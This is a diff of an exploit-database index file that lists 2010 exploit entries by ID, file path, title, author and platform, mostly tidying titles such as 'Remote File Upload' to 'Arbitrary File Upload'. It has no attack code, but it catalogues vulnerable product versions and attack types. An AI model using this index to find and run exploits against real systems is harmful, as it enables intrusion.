+11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,windows,dos,0 11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 -11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Remote File Upload",2010-02-06,anonymous,php,webapps,0 +11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos,0 11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0 @@ -10419,16 +10420,16 @@ id,file,description,date,author,platform,type,port 11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,"ViRuSMaN ",asp,webapps,0 11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow (PoC)",2010-02-09,"fl0 fl0w",windows,dos,0 11364,platforms/multiple/local/11364.txt,"LDAP - Injection (PoC)",2010-02-09,"mc2_s3lector ",multiple,local,0 -11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Remote File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 +11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 11366,platforms/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 -11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 +11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local,0 11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos,0 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script - Remote File Disclosure",2010-02-09,JIKO,php,webapps,0 -11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload",2010-02-09,JIKO,php,webapps,0 +11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Arbitrary File Upload",2010-02-09,JIKO,php,webapps,0 11378,platforms/php/webapps/11378.txt,"NewsLetter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps,0 11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local,0 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 @@ -10443,7 +10444,7 @@ id,file,description,date,author,platform,type,port 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - Denial of Service",2010-02-11,"cp77fk4r ",php,dos,0 -11398,platforms/php/webapps/11398.txt,"GameRoom Script - Authentication Bypass / File Upload",2010-02-11,JIKO,php,webapps,0 +11398,platforms/php/webapps/11398.txt,"GameRoom Script - Authentication Bypass / Arbitrary File Upload",2010-02-11,JIKO,php,webapps,0 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 - Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,windows,local,0 11401,platforms/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 @@ -10470,7 +10471,7 @@ id,file,description,date,author,platform,type,port 11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 11429,platforms/php/webapps/11429.txt,"Vito CMS - SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 -11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Remote file upload",2010-02-13,Phenom,php,webapps,0 +11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0 11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0 @@ -10486,7 +10487,7 @@ id,file,description,date,author,platform,type,port 11447,platforms/php/webapps/11447.txt,"Joomla (Jw_allVideos) - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 -11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (Denial of Service) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 +11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 @@ -10494,14 +10495,14 @@ id,file,description,date,author,platform,type,port 11457,platforms/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add Exploit)",2010-02-15,"Sioma Labs",windows,remote,0 11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog 0.16 Plugin - SQL Injection",2010-02-15,kaMtiEz,php,webapps,0 11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Arbitrary File Upload (Bypass)",2010-02-15,indoushka,php,webapps,0 -11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin",2010-02-15,indoushka,php,webapps,0 +11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Admin Bypass",2010-02-15,indoushka,php,webapps,0 11462,platforms/php/webapps/11462.txt,"blog ink - Bypass Setting",2010-02-15,indoushka,php,webapps,0 11463,platforms/php/webapps/11463.txt,"Joomla Component com_joomportfolio - Blind Injection",2010-02-15,snakespc,php,webapps,0 11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare - SQL Injection",2010-02-15,snakespc,php,webapps,0 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0 -11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Exploit",2010-02-15,dookie,windows,remote,21 +11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2010-02-15,dookie,windows,remote,21 11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0 @@ -10510,7 +10511,7 @@ id,file,description,date,author,platform,type,port 11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,windows,local,0 11476,platforms/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,php,webapps,0 11477,platforms/php/webapps/11477.txt,"Limny 2.0 - (Change Email and Password) Cross-Site Request Forgery",2010-02-16,"Luis Santana",php,webapps,0 -11478,platforms/php/webapps/11478.txt,"Limny 2.0 - Create Admin User Cross-Site Request Forgery Exploit",2010-02-16,"Luis Santana",php,webapps,0 +11478,platforms/php/webapps/11478.txt,"Limny 2.0 - Create Admin User Cross-Site Request Forgery",2010-02-16,"Luis Santana",php,webapps,0 11479,platforms/php/webapps/11479.txt,"Joomla Component com_acstartseite - SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11480,platforms/php/webapps/11480.txt,"Joomla Component com_acprojects - SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11481,platforms/php/webapps/11481.txt,"intuitive - 'form.php' SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10524,14 +10525,14 @@ id,file,description,date,author,platform,type,port 11489,platforms/php/webapps/11489.txt,"Erotik Auktionshaus - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0 11491,platforms/multiple/local/11491.rb,"iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0 -11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Denial of Service (Stack overflow)",2010-02-18,wirebonder,windows,dos,0 +11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0 11494,platforms/php/webapps/11494.txt,"Joomla Component com_otzivi - Local File Inclusion",2010-02-18,"AtT4CKxT3rR0r1ST ",php,webapps,0 11495,platforms/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,"AtT4CKxT3rR0r1ST ",php,webapps,0 11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0 11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0 11498,platforms/php/webapps/11498.txt,"Joomla Plugin Core Design Scriptegrator - Local File Inclusion",2010-02-18,"S2 Crew",php,webapps,0 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0 -11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote Buffer Overflow Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0 +11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",windows,remote,0 11502,platforms/php/webapps/11502.txt,"phpAutoVideo - Cross-Site Request Forgery",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) Cross-Site Request Forgery / Cross-Site Scripting",2010-02-19,d1dn0t,php,webapps,0 11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection",2010-02-19,Ariko-Security,php,webapps,0 @@ -10540,7 +10541,7 @@ id,file,description,date,author,platform,type,port 11509,platforms/php/webapps/11509.txt,"PHPKit 1.6.1 - 'mailer.php' SQL Injection",2010-02-19,"Easy Laster",php,webapps,0 11511,platforms/php/webapps/11511.txt,"Joomla Component com_communitypolls 1.5.2 - Local File Inclusion",2010-02-19,kaMtiEz,php,webapps,0 11515,platforms/php/webapps/11515.txt,"FlatFile Login System - Remote Password Disclosure",2010-02-20,"ViRuSMaN ",php,webapps,0 -11516,platforms/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery Remote Add Admin Exploit",2010-02-20,"ViRuSMaN ",php,webapps,0 +11516,platforms/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery Remote Add Admin",2010-02-20,"ViRuSMaN ",php,webapps,0 11517,platforms/php/webapps/11517.txt,"Netzbrett - Database Disclosure",2010-02-20,"ViRuSMaN ",php,webapps,0 11518,platforms/php/webapps/11518.txt,"Softbiz Jobs - (news_desc) SQL Injection",2010-02-22,BAYBORA,php,webapps,0 11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 @@ -10562,7 +10563,7 @@ id,file,description,date,author,platform,type,port 11536,platforms/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - '.wav' Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 11537,platforms/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,"cr4wl3r ",windows,dos,0 11539,platforms/windows/remote/11539.py,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0 -11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player 1.31 - '.wav' Local Crash Exploit",2010-02-22,v3n0m,windows,dos,0 +11540,platforms/windows/dos/11540.pl,"E.M. Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,windows,dos,0 11541,platforms/windows/dos/11541.pl,"E.M. Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,windows,dos,0 11543,platforms/php/webapps/11543.txt,"Softbiz Jobs - Cross-Site Request Forgery",2010-02-23,"pratul agrawal",php,webapps,0 11544,platforms/php/webapps/11544.php,"Joomla Component com_ice - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0 @@ -10604,7 +10605,7 @@ id,file,description,date,author,platform,type,port 11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,"cr4wl3r ",php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 -11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 +11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,"cr4wl3r ",php,webapps,0 11588,platforms/php/webapps/11588.txt,"phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service",2010-02-27,Ale46,multiple,dos,0 @@ -10630,14 +10631,14 @@ id,file,description,date,author,platform,type,port 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0 11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus ",win_x86,remote,0 11616,platforms/php/webapps/11616.txt,"My Little Forum - contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 -11617,platforms/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash Exploit",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 +11617,platforms/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal - 'index.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0 11621,platforms/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,"cr4wl3r ",php,webapps,0 11622,platforms/windows/dos/11622.php,"Opera 10.50 - integer Overflow",2010-03-03,"Marcin Ressel",windows,dos,0 11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0 -11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution Exploit",2010-03-03,JosS,php,webapps,0 +11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0 11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0 11628,platforms/windows/dos/11628.pl,"AKoff MIDI Player 1.00 - Buffer Overflow",2010-03-04,"cr4wl3r ",windows,dos,0 @@ -10645,7 +10646,7 @@ id,file,description,date,author,platform,type,port 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 11632,platforms/windows/dos/11632.txt,"Orb 2.0.01.0049 < 2.54.0018 - DirectShow Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 11633,platforms/hardware/dos/11633.pl,"Sagem Routers - Remote Reset Exploit",2010-03-04,AlpHaNiX,hardware,dos,0 -11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass Exploit",2010-03-04,AlpHaNiX,hardware,webapps,0 +11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"ONECMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang (proc_open PHP safe mode Bypass 4.3.10 - 5.3.0)",2010-03-05,"Hamid Ebadi",php,webapps,0 11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - news.php 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 @@ -10702,7 +10703,7 @@ id,file,description,date,author,platform,type,port 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - 'topic.php' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11704,platforms/php/webapps/11704.txt,"dreamlive Auktionshaus script - news.php 'id' SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 -11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - NULL Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 +11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 @@ -10729,7 +10730,7 @@ id,file,description,date,author,platform,type,port 40084,platforms/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook - SQL Injection",2010-03-14,snakespc,php,webapps,0 -11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ITSecTeam,php,webapps,0 +11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,php,webapps,0 11732,platforms/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps,0 11733,platforms/php/webapps/11733.txt,"PHPpool media Domain Verkaufs und Auktions Portal - 'index.php' SQL Injection",2010-03-14,"Easy Laster",php,webapps,0 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0 @@ -10744,9 +10745,9 @@ id,file,description,date,author,platform,type,port 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 11743,platforms/php/webapps/11743.txt,"Joomla Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 -11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload",2010-03-15,indoushka,php,webapps,0 +11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Arbitrary File Upload",2010-03-15,indoushka,php,webapps,0 11746,platforms/php/webapps/11746.txt,"Torrent Hoster - Remount Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0 -11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 - Upload",2010-03-15,EL-KAHINA,php,webapps,0 +11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 - Arbitrary File Upload",2010-03-15,EL-KAHINA,php,webapps,0 11748,platforms/php/webapps/11748.txt,"Interspire SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps,0 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,php,webapps,0 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0 @@ -10767,7 +10768,7 @@ id,file,description,date,author,platform,type,port 11768,platforms/php/webapps/11768.txt,"Newbie CMS - File Disclosure",2010-03-15,JIKO,php,webapps,0 11769,platforms/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",hardware,dos,0 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST Denial of Service",2010-03-16,dmnt,linux,dos,21 -11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - 'FCKeditor' Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0 +11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - 'FCKeditor' Arbitrary File Upload",2010-03-16,ITSecTeam,php,webapps,0 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0 11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net - SQL Injection",2010-03-16,"Th3 RDX",php,webapps,0 @@ -10775,7 +10776,7 @@ id,file,description,date,author,platform,type,port 11776,platforms/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System - Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps,0 11777,platforms/php/webapps/11777.txt,"eGroupWare 1.6.002 and eGroupWare premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11778,platforms/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 -11779,platforms/windows/local/11779.pl,"Windisc 1.3 - Stack Buffer Overflow Exploit",2010-03-16,Rick2600,windows,local,0 +11779,platforms/windows/local/11779.pl,"Windisc 1.3 - Stack Buffer Overflow",2010-03-16,Rick2600,windows,local,0 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"chilly_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps,0 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include - SQL Injection",2010-03-17,"DevilZ TM",php,webapps,0 @@ -10788,7 +10789,7 @@ id,file,description,date,author,platform,type,port 11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - '.m3u' Local Buffer Overflow (SEH)",2010-03-18,n3w7u,windows,local,0 -11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - NULL pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 +11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 11794,platforms/windows/local/11794.c,"Mediacoder - '.lst' Local Buffer Overflow",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - Local File Inclusion",2010-03-18,ITSecTeam,php,webapps,0 @@ -10796,7 +10797,7 @@ id,file,description,date,author,platform,type,port 11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection / Cross-Site Scripting",2010-03-18,d3v1l,php,webapps,0 11801,platforms/php/webapps/11801.txt,"phpAuthent 0.2.1 - SQL Injection",2010-03-18,Gamoscu,php,webapps,0 11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection",2010-03-18,ViRuS_HiMa,php,webapps,0 -11803,platforms/windows/dos/11803.txt,"Crimson Editor - SEH Overwrite",2010-03-18,sharpe,windows,dos,0 +11803,platforms/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,windows,dos,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II - Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusion",2010-03-18,"cr4wl3r ",php,webapps,0 @@ -10816,7 +10817,7 @@ id,file,description,date,author,platform,type,port 11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps,0 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 -11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 - SEH Overwrite Exploit (PoC)",2010-03-21,mr_me,windows,local,0 +11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 - Overwrite (SEH) (PoC)",2010-03-21,mr_me,windows,local,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection",2010-03-21,n3w7u,php,webapps,0 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion",2010-03-21,"cr4wl3r 